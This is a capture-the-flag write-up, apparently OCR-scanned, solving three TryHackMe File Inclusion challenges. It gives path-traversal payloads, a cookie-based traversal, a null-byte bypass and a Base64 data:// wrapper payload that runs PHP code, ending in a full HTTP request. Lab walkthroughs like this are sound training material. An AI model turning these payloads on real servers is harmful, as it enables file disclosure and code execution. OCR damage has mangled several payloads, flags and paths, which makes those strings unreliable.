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{THM} File Inclusion Room (Challenge) 


Summary 


The following is a documentation of the steps taken to solve the Challenge section 
in the THM File Inclusion Room. The room introduces us to the concepts of Local 
and Remote file intrusion as well as common techniques employed to facilitate 
such attacks. 


Path Traversal and Filter bypasses are both covered by the content of the room 
and will be used in the solutions to the challenges. 


This document only covers Challenges 1, 2, and 3. 


Challenge 1: 


Objective: 
Capture the flag! 
There is a flag hidden in the folder structure of the host machine etc/flag: . 


All we are provided with. is a webpage with a single text input field to work 
with. We will need to use the above-mentioned LFI techniques to navigate 
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our way to the flag location. 


Solution: 


We start by initiating both the attack box and the VM that will serve as the host 
of the challenges from the THM Room. Next, we navigate our way to challenge 
one on the VM following the provided instructions. 


The first thing we see for this challenge is the hint regarding the request type 
we might need to change in order to achieve our objective. 


File Inclusion Lab 


Lab #Challenge-1: Include a file in the input form below 


The input form is broken! You need to send “POST request with ‘file’ parameter! 


FileName For example: welcome.php 


Next, we will inspect the HTML code to locate and change the request type. To 
do this: 


1. Fn + F12 to open the developer tools in your browser 
2. Navigate to the inspection menu 


3. Navigate to the Body - You can make use of the highlighting function by 
moving the cursor to the input field and observing which part of the code 
was highlighted as a result. 


4. Next, we will Change the ‘'GET” to ‘POST’ 
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File Inclusion Lab 


Lab #Challenge-1: Include a file in the input form below 


| FileName For example: welcome.php 


--------------------------- -- - - - — — — — — — es 


Ce O Inspector 


Once this is done - now we can insert our LFI bypass payload into the text 
field. 


We will re-use the format of 4 directories to escape to reach the etc we 
learned in the room's earlier exercises and will use the following payload to 
capture the flag: /../../../../etc/flagi 


v SPOILER ALERT: 


With this, we have successfully captured our first flag: -1x3d-inpu7-forrn 


Challenge 2: 


Objective: 
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Same as the objective for our first challenge - Capture the flag! 


Only this time we don't even have a text field to work with. We are just met by a 
message informing us that only admins can access the page. 


Solution: 
For this one, we will do some cookie manipulation &@ 
Navigate to the challenge page and again Fn + F12 to open the developer tools. 


This time around go to the storage menu in the dev tools menu and from there 


to Cookies. 
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Lab #Challenge-2: Include a file in the input form below 
B Welcome Guest! 


Only admins can access this page! 


ce I C Console je Network Style Edit 2) Perf ance Me E Storage Wr Accessibility 


B Cache Storage 


B Cookies 


@ http://10.10.247.189 THM 


& Indexed DB 
B Local Storage 


B Session Storage 
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Now if you are anything like me the next thing you will try is to substitute the cuest 
for admin and specify the path in the path field for the cookie. Spare yourself the 
effort this will not work. The admin substitution will grant you a screen that will 
greet you as admin and will display the error, but will not help you any further. 


What we will do instead is to specify our path in the Value field - again reusing the 
structure from the room: 
Aas aA sn CEC/ tlag2 


This gets us here: 
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Lab #Challenge-2: Include a file in the input Form below 


Current Path 


/var/www/htm1 


File Content Preview of ../../../../etc/Flag2 


Welcome ../../../../etc/flag2 


Warning: include(includes/../../../../etc/flag2.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on 
line 37 


Warning: include() [function.include]: Failed opening 'includes/../../../../etc/flag2.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in 
/var/www/html/chall2.php on line 37 


So we made it past the Admin filter - but no cigar. From the error message, we can 
identify a filter that is appending php to our value. 


In order to bypass this we will use a NULL BYTE «oo 


at the end of our input - this will comment out any conditions coming after it - 
thereby negating the requirement for a PHP file and returning our flag. 
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v SPOILER ALERT: 
After appending the null byte and refreshing you will be rewarded with the flag 


: c00k13_i5_yuMmy1 


Challenge 3: 


Objective: 
Yes, you guessed it - Capture that flag! 


Solution: 


Once more we start with the familiar path as payload in order to see what if any 
feedback we will get to aid us ( /../../../../etc/flag3 ). 


The output of. this prompt along with the hints we get from THM leads us to our 
next steps: 


[Hint#1] Not everything is filtered! [Hint #2] The website uses $_REQUESTS to 
accept HTTP requests. Do research to understand it and what it accepts! 


File Content Preview of etcflag 
Warning: include(etcflag.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall3.php on line 30 


Warning: include() [function.include]: Failed opening ‘etcflag.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall13.php 


on line 30 


We need to change the request type. Let's try to manipulate the HTML in the dev 
tools again. 
Doing this and feeding the same payload returns a different error, but no flag. 


lronHack Write-up 


File Content Preview of /../../../../etc/Flag3 
Warning: include(/../../../../etc/flag3.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall3.php on line 49 


Warning: include() [function.include]: Failed opening '/../../../../etc/flag3.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www 


/html/chall3.php on line 49 


Changing the request type and including NULL Bytes did not reveal the flag for us 
this time. 

The next step that we will take is to deploy the use of the tool called 

Burp Suite - pre-installed on the VM. 

With Burp Suite we can interfere all requests from our machine using the proxy 
function and manipulate them to our heart's desire. 


Quick Burp guide: 
1. Load the Programm 
2. Click next on the initiation phases 
3. Navigate to Proxy and enable 
4. Back to the browser : 
a. Find the foxy-proxy extension 


b. select Burp 


Now your requests will be frozen and captured by Burp - where you can change 
them at will and forward them to the target server. 


When the typical LFI techniques (like path traversal or null byte injection) failed 
due to .php extension appending, we hypothesized that PHP stream wrappers 
could provide a way to bypass these restrictions. 


If certain PHP configurations ( allow url include and allow_url_fopen ) were enabled, 
we could use these wrappers to include files or execute code directly from other 
sources like data:// OF php://. 

To test our hypothesis about the PHP configuration, we decided to use the data: // 
stream wrapper to execute a phpinfo() Command on the server. 


lronHack Write-up 


We crafted a Base64-encoded payload: ppowatagechwawsmbygpoya/Pg== , Which 
decodes to <?php phpinfo(); 2>. The choice for Base64 and not plaintext was to 


prevent special character interpretation and injection issues. 


GET /challenges///////cha113.php?file=data://text/plain;base64, | 
HOSE : 101101132124 


The phpinfo() Output revealed the entire PHP configuration of the server. 
In the output, we specifically looked for two settings: 


e allow url fopen: Controls whether the PHP fopen() and similar functions can 
open remote files. 


e allow url include : Controls whether include and require statements can include 
remote files or resources using URLs (like http://, data://). 


File Name For example: welcome 


Current Path 


/var/www/html 


File Content Preview of data://text 
/plain;base64,PD9waHAgcGhwaW5mbygpOyBzexNOZWOojJ2NhdCAvVZXRjL2ZsYWczJyk7ID8+ 


System Linux f8c5b1a78692 5.15.0-1064-aws #70~20.04.1-Ubuntu SMP Fri Jun 14 15:42:13 UTC 2024 


Server API Apache 2.0 Handler 
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Both allow url fopen ANd allow url include were set to on inthe phpinfo() Output. 
Knowing that these settings were enabled allowed us to understand that the 
server could execute code directly from stream wrappers. 


So now our objective is to use the aata:// stream wrapper to execute PHP code 
that reads and outputs the contents of the /etc/riags file. 


We start with. preparing the payload in plain PHP before converting it to Base64 to 
be injected in the request. 


<?php echo file_get_contents('/etc/flag3'); ?> 


The final POST request should look something like this : 


POST /challenges/////chal13.php HTTP/1.1 

Host: 10.10.247.189 

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Ge 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, ir 
Accept-Language: en-US, en;q=0.5 

Accept-Encoding: gzip, deflate, br 

Connection: close 

Referer: http://10.10.247.189/challenges////chall13.php 
Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 130 


file=data://text/plain; base64, PD9waHAgZWNobyBmaWx1X2d1dF9jb250Z\ 


v SPOILER ALERT: 


As a reward for our efforts at the end we should obtain the 3rd flag: 
POst_1s_w0rk1in9 
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File Inclusion Lab 


Lab #Challenge 3: Include a file in the input Form below 
FileName For example: welcome 


Current Path 


/var/www/html 


File Content Preview of data://text/plain;base64,PD9waHAgZWNobyBmaWx|Xx2dldF9jb250ZW50cygnL2VOYy9mbGFnMycpOyA/Pg== 


P@st_is wOrki1in9 a 
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